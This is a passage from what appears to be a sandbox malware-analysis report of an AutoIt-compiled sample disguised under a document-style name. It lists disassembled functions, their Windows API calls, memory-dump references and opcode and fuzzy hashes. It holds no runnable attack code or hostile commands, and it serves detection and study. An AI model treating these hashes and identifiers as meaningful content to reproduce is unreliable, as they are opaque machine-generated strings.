                                                        • Instruction Fuzzy Hash: EFE01235204214AFD710ABA9D408A96B7EC9F54790F00C426A945D7251DAB8E9408BA0
                                                        Function 0077F3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0077F41A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogNtdllProc_
                                                        • String ID:
                                                        • API String ID: 3239928679-0
                                                        • Opcode ID: 6b8329ff8d6f04c6feb70116cc41e3b3f83ac464a5e6e6c572ba52d4f82ef137
                                                        • Instruction ID: b35556073a8dee455780ccf09f20774c3289bfd3a675344e28ee5eb69911d1b5
                                                        • Opcode Fuzzy Hash: 6b8329ff8d6f04c6feb70116cc41e3b3f83ac464a5e6e6c572ba52d4f82ef137
                                                        • Instruction Fuzzy Hash: B4F0ED31200288BFCF21DF98CC08FC23BA4FB05360F048059FA14272E1CB746820E764
                                                        Function 0072AC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0072ACC7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogLongNtdllProc_Window
                                                        • String ID:
                                                        • API String ID: 2065330234-0
                                                        • Opcode ID: 6df4b1bb4804c177775efd0207e39250c4d1f3644f3a2e18f89a6abbc786a877
                                                        • Instruction ID: de7996d4be8bd434e22c018fd90dd5e57fd41dcd9747880a28d0072bbce3d0b3
                                                        • Opcode Fuzzy Hash: 6df4b1bb4804c177775efd0207e39250c4d1f3644f3a2e18f89a6abbc786a877
                                                        • Instruction Fuzzy Hash: C8E0EC35100208FBCF15AF90DC55E643B36FB49354F508419F6454A2A1CA3AA962EB55
                                                        Function 0077F425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0078F3D4,?,?,?,?,?,?), ref: 0077F450
                                                          • Part of subcall function 0077E13E: _memset.LIBCMT ref: 0077E14D
                                                          • Part of subcall function 0077E13E: _memset.LIBCMT ref: 0077E15C
                                                          • Part of subcall function 0077E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007D3EE0,007D3F24), ref: 0077E18B
                                                          • Part of subcall function 0077E13E: CloseHandle.KERNEL32 ref: 0077E19D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                        • String ID:
                                                        • API String ID: 2364484715-0
                                                        • Opcode ID: 120b16b65b3cef83a7e98b3f1e0d6a218b59510d6351deefca81b298873fe5a1
                                                        • Instruction ID: 4d843bbbe263433519437f441695baafab134f4d655ffcb3eb020530f943df19
                                                        • Opcode Fuzzy Hash: 120b16b65b3cef83a7e98b3f1e0d6a218b59510d6351deefca81b298873fe5a1
                                                        • Instruction Fuzzy Hash: F7E09231210249EFCF11EF58DD45E9637A6FB08390F41C055FA09572B1C735A961EF55
                                                        Function 0077F37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtdllDialogWndProc_W.NTDLL ref: 0077F3A1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogNtdllProc_
                                                        • String ID:
                                                        • API String ID: 3239928679-0
                                                        • Opcode ID: 7d55d277ded1c34454b9cbd6d7ad19d31989f7c28ec71a1532fe58121335e8f0
                                                        • Instruction ID: bf3e4bf9cf3d3606f0fb52adf0f5092b8a87bc7eb9ee697cb2a3fcf6220301d2
                                                        • Opcode Fuzzy Hash: 7d55d277ded1c34454b9cbd6d7ad19d31989f7c28ec71a1532fe58121335e8f0
                                                        • Instruction Fuzzy Hash: 6BE0E23420424CEFCB01DF88D844E863BA5FB1A350F014055FD048B261C771A830EB61
                                                        Function 0077F3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtdllDialogWndProc_W.NTDLL ref: 0077F3D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogNtdllProc_
                                                        • String ID:
                                                        • API String ID: 3239928679-0
                                                        • Opcode ID: 94ac9fbce110fbb057c0536b32de0343c1078f6ea73fbebce4c1ef5c66b1df20
                                                        • Instruction ID: c33bce632746b60c6623bce1093a89a5eadc44b458db503616b6587b547c3b44
                                                        • Opcode Fuzzy Hash: 94ac9fbce110fbb057c0536b32de0343c1078f6ea73fbebce4c1ef5c66b1df20
                                                        • Instruction Fuzzy Hash: 95E0173420024CEFCB01DFC8D844E863BA5FB1A350F014055FD448B362C772A870EBA1
                                                        Function 0072B845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                          • Part of subcall function 0072B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0072B85B), ref: 0072B926
                                                          • Part of subcall function 0072B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0072B85B,00000000,?,?,0072AF1E,?,?), ref: 0072B9BD
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0072AF1E,?,?), ref: 0072B864
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                        • String ID:
                                                        • API String ID: 2797419724-0
                                                        • Opcode ID: 0ff652bbcf5741f2019a9fa82eb52c2278d2a4f2f1f088ea5c0d6b82eee4e09d
                                                        • Instruction ID: 9bc3ae77e047bb3466f4beb3caf173b94aaa8b9cb3a8225d7f2d13d8c06974be
                                                        • Opcode Fuzzy Hash: 0ff652bbcf5741f2019a9fa82eb52c2278d2a4f2f1f088ea5c0d6b82eee4e09d
                                                        • Instruction Fuzzy Hash: 3FD0127214430CB7DB106BA1ED0BF493A1DAB04750F808431F605691E18A79A861A5A9
                                                        Function 0078C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID:
                                                        • API String ID: 2645101109-0
                                                        • Opcode ID: 5d65fcd87641468af10fbfceb1d5922c41c0d37f7073cd5683b1ca8c4f8ea81d
                                                        • Instruction ID: b8ec2ff21bfb0d4ab096de6bf000f259e9037d85d8f0751d6cd0b71e452e6013
                                                        • Opcode Fuzzy Hash: 5d65fcd87641468af10fbfceb1d5922c41c0d37f7073cd5683b1ca8c4f8ea81d
                                                        • Instruction Fuzzy Hash: 0BC04CB140400DDFC715DB84C9859EFB7BCBB04300F108096A115E1000D7749B459B76
                                                        Function 00738E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00738E1F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: e8bb9274adffbd7b72b7d5444c348375029d3668fe0f8d6de0e6f72e32c7f267
                                                        • Instruction ID: f2087f1edeba90dbacefdb012addc65d1fe8c423e554641c903cc132cc952175
                                                        • Opcode Fuzzy Hash: e8bb9274adffbd7b72b7d5444c348375029d3668fe0f8d6de0e6f72e32c7f267
                                                        • Instruction Fuzzy Hash: 78A0243000050CF7CF001F71FC044447F5CD705151700C011F40C00131C7335C1145C5
                                                        Function 0073A937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00736AE9,007C67D8,00000014), ref: 0073A937
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess
                                                        • String ID:
                                                        • API String ID: 54951025-0
                                                        • Opcode ID: 23662ccb48c916790ca863418b0591523111506d63d44eafc70399de5a151ccc
                                                        • Instruction ID: 7667f2e1d62c868cfb773455b6ed004a8a9c578401046af96127a27346d38153
                                                        • Opcode Fuzzy Hash: 23662ccb48c916790ca863418b0591523111506d63d44eafc70399de5a151ccc
                                                        • Instruction Fuzzy Hash: E9B012B13035024BD7084B38AC6421A3AE45749101342D03F7003C2560DB349810DF04
                                                        Function 00730EC4 Relevance: .3, Instructions: 345COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                        • Instruction ID: 70ec7a8712cb9a8e827453b76f7785613839992dd70050742b2df6a577ff67c0
                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                        • Instruction Fuzzy Hash: 1DC1A2722051A34AFF2D463AC43443FBFA15AA27B271A476DD4B3CB4C6EE28C564D660
                                                        Function 007312F9 Relevance: .3, Instructions: 341COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                        • Instruction ID: 15966f07e11b16cc6ff4171db01260c5ab18912d54bb9042702197c9f4b1652c
                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                        • Instruction Fuzzy Hash: 65C1C5722051A34AFF2D463AD43443FBFA15AA27B271A476DD4B3CB4C6EE28C524D660
                                                        Function 00730A8F Relevance: .3, Instructions: 331COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                        • Instruction ID: 568e522d65938c55f651cc17963de7b0f490dcf489ad58bff2af44c6a36f3d0e
                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                        • Instruction Fuzzy Hash: 74C1C4722051A349FF2D4639943443FFEA15AA27B6B1A476DD4B3CB4C2EE2CC524D6A0
                                                        Function 00730677 Relevance: .3, Instructions: 323COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction ID: b4d682297c6391f69e35546ebb500a88d67c4e0331fd4f7b9cde530fe7333ef5
                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction Fuzzy Hash: 6AC1D3722051A34AFF2D4639943453FFFA15EA27B270A476DD4B3CB4C6EE28D524C6A0
                                                        Function 0076A750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 0076A7A5
                                                        • DeleteObject.GDI32(00000000), ref: 0076A7B7
                                                        • DestroyWindow.USER32 ref: 0076A7C5
                                                        • GetDesktopWindow.USER32 ref: 0076A7DF
                                                        • GetWindowRect.USER32(00000000), ref: 0076A7E6
                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0076A927
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0076A937
                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076A97F
                                                        • GetClientRect.USER32(00000000,?), ref: 0076A98B
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0076A9C5
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076A9E7
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076A9FA
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076AA05
                                                        • GlobalLock.KERNEL32(00000000), ref: 0076AA0E
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076AA1D
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0076AA26
                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076AA2D
                                                        • GlobalFree.KERNEL32(00000000), ref: 0076AA38
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0076AA4A
                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0079D9BC,00000000), ref: 0076AA60
                                                        • GlobalFree.KERNEL32(00000000), ref: 0076AA70
                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0076AA96
                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0076AAB5
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076AAD7
                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076ACC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                        • API String ID: 2211948467-2373415609
                                                        • Opcode ID: fb067e24cf63860fff709958e17d70bc810a8fbe819735df831ef0bc97557974
                                                        • Instruction ID: c8d903484bccaed83ea012983c476ef292b373c02dc3fcc1df680c89d55b42fa
                                                        • Opcode Fuzzy Hash: fb067e24cf63860fff709958e17d70bc810a8fbe819735df831ef0bc97557974
                                                        • Instruction Fuzzy Hash: 33028E71A00205FFDB14DFA8DD89EAE7BB9EB49310F048159F906AB2A1D7389D41CF64
                                                        Function 0077D095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 0077D0EB
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0077D11C
                                                        • GetSysColor.USER32(0000000F), ref: 0077D128
                                                        • SetBkColor.GDI32(?,000000FF), ref: 0077D142
                                                        • SelectObject.GDI32(?,00000000), ref: 0077D151
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0077D17C
                                                        • GetSysColor.USER32(00000010), ref: 0077D184
